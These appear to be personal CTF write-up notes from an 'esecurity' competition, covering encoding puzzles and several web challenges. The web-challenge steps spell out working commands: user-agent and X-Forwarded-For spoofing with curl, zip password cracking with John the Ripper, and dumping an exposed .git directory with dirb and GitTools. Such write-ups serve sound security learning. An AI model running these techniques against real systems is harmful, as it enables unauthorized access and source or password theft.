Pastebin style!
1 Flag format is always esecurity{xxxxx}.
Can you find the first flag? ZXNlY3VyaXR5e3dhcm1pbmdfdXB9
base64
2 We’ve found this strange code and we’re unsure what it is. Can you help us and decode it and recover the flag?
JSFuck
2 Can you open this file?
On unixids (MacOS), nobody cares about extensions, magic bytes rule…
Can you see us? 3 Can you? http://178.22.217.52/canyouseeme/
Cookies
curl -I http://178.22.217.52/canyouseeme/
4 We’ve discovered this strange audio file on one of our servers. It should contain the flag but we weren’t able to recover it. While trying to recover the flag 2 of our team members ended up like Jack Nicholson in The Shining. Third one ended up like Jack Nicholson in One Flew Over the Cuckoo’s Nest.
Hint: don’t forget about correct flag format: esecurity{XXXXXXX}
https://www.sonicvisualiser.org/download.html
–..– –..– – — .-. … . .. … ..-. ..- .- .. … - …. . ..-. .-.. .- –. -… ..- - -.. — -. - ..-. — .-. –. . - - …. . -.-. ..- .-. .-.. - .-.. -… .-. .- -.-. -.- . - …
https://cryptii.com/pipes/morse-code-to-text
Read the flag to get the answer.
##Logo
5
Someone told us that there is something hidden in our logo. Could you please check and let us know?
$ exiftool
...
User Comment : 5c87N7XYVY7kmTLaVN5NU5smnqrL3adgwtSBPd5N
...
https://gchq.github.io/CyberChef/
Thanks to EK for cracking this one :D
base58 bitcoin
5 We encrypted this flag very securely. There is no way you’ll be able to decode it.
Vigenere dcode.fr
5
This challenge is not meant for you. See, you won’t be able to get the flag: http://hfl.esecurity.rs/robots/
curl -A "'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')" http://178.22.217.52/robots/flag/flag.txt
5 We’ve created this challenge but unfortunately we can’t remember the password. Guess there is no way to recover it now. Maybe we can trow rocks on it and hope it breaks open?
$ zip2john flag.zip > key.txt
kali@kali:~/Documents/esecurity$ john --format=zip --wordlist=/usr/share/wordlists/rockyou.txt key.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Badminton1234 (flag.zip/flag.txt)
1g 0:00:10:13 DONE (2020-03-31 14:48) 0.001629g/s 18526p/s 18526c/s 18526C/s Bado89..Badgirl01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/Documents/esecurity$ 7z e flag.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz (306F2),ASM,AES-NI)
Scanning the drive for archives:
1 file, 231 bytes (1 KiB)
Extracting archive: flag.zip
--
Path = flag.zip
Type = zip
Physical Size = 231
Enter password (will not be echoed):
Everything is Ok
Size: 39
Compressed: 231
kali@kali:~/Documents/esecurity$ cat flag.txt
esecurity{flag}
6 Our security engineers hardened this flag so it’s only accessible within our own network. There is no way you’ll be able to recover it: http://hfl.esecurity.rs/fromhome/flag.txt
curl --header "X-Forwarded-For: 127.0.0.1" "http://hfl.esecurity.rs/fromhome/flag.txt
6 I just came here to show you my crazy php coding skillz: http://hfl.esecurity.rs/leakme/
this is my php script. actually it's not a php script, it's just text
file with a fancy extension.
Don't be harsh, I'm still learning this.
After almost 60 days stuck in it,
I've finally managed to learn how to exit vim but
during exiting I've probably made some changes
to vim configuration and some hackers told me that
now my source code is leaking.
Please don't hack me.
Vim is storing backup files with ~.
http://hfl.esecurity.rs/leakme/index.php~
6 You’ll retrieve this flag only by praying
Image
https://en.wikipedia.org/wiki/The_Ciphers_of_the_Monks
101 115 101 99 117 114 105 116 121 123 99 111 100 101 95 111 102 95 103 111 100 125 esecurity{xxx}
Easier way: https://www.dcode.fr/cistercian-numbers
Thanks to EK for cracking this one with me.
6
First you’ll need to find out who I am. That will help you to decode this message.
I’m the one who invented both of these stuff:
osintcrypto.txt
{"encrypted_flag" : "CNHPARVNE9MQ8YBVD9SPYVJZC5Q68QVMD1MQ6QVKEHS62VK7CNFP4RBKCMSK4Z8"}
json and encoding
https://en.wikipedia.org/wiki/Douglas_Crockford
https://www.dcode.fr/crockford-base-32-encoding
##My Secure Blog 10 No more Wordpress for me, I’m not a noob anymore. I’ve created this static html website, super secure, unhackable. Wordpress is now removed and I have backups and version control. No way you’re be able to hack me.
Check it out: http://178.22.217.52/mysecureblog/
http://178.22.217.52/mysecureblog/
Source:
<!--Don't forget to remove version-control system from web root before deployment -->
kali@kali:~/opt/dvcs-ripper$ dirb http://178.22.217.52/mysecureblog/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Apr 1 12:25:28 2020
URL_BASE: http://178.22.217.52/mysecureblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://178.22.217.52/mysecureblog/ ----
+ http://178.22.217.52/mysecureblog/.git/HEAD (CODE:200|SIZE:23)
+ http://178.22.217.52/mysecureblog/index.html (CODE:200|SIZE:1614)
-----------------
END_TIME: Wed Apr 1 12:28:29 2020
DOWNLOADED: 4612 - FOUND: 2
http://178.22.217.52/mysecureblog/.git/HEAD
ref: refs/heads/master
http://178.22.217.52/mysecureblog/.git/config
https://github.com/internetwache/GitTools
kali@kali:~/opt/GitTools/Dumper$ ./gitdumper.sh http://178.22.217.52/mysecureblog/.git/ aa
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[+] Creating aa/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/39/42bcae4b0bee131298b40f4a7c5afcb490fab2
[-] Downloaded: objects/00/00000000000000000000000000000000000000
...
kali@kali:~/opt/GitTools/Extractor/aa$ ./extractor.sh ../Dumper/aa/ aa
kali@kali:~/opt/GitTools/Extractor/aa/0-3942bcae4b0bee131298b40f4a7c5afcb490fab2$ grep -H esecurity *
grep: css: Is a directory
grep: images: Is a directory
grep: includes: Is a directory
grep: js: Is a directory
grep: maint: Is a directory
grep: network: Is a directory
grep: user: Is a directory
users.php:secret esecurity stuff: ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
kali@kali:~/Documents/esecurity/aa$ echo 'ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9' | base64 -d
esecurity{FLAG}
import codecs
codecs.decode('aa','rot_13')
codecs.encode('nn','rot_13')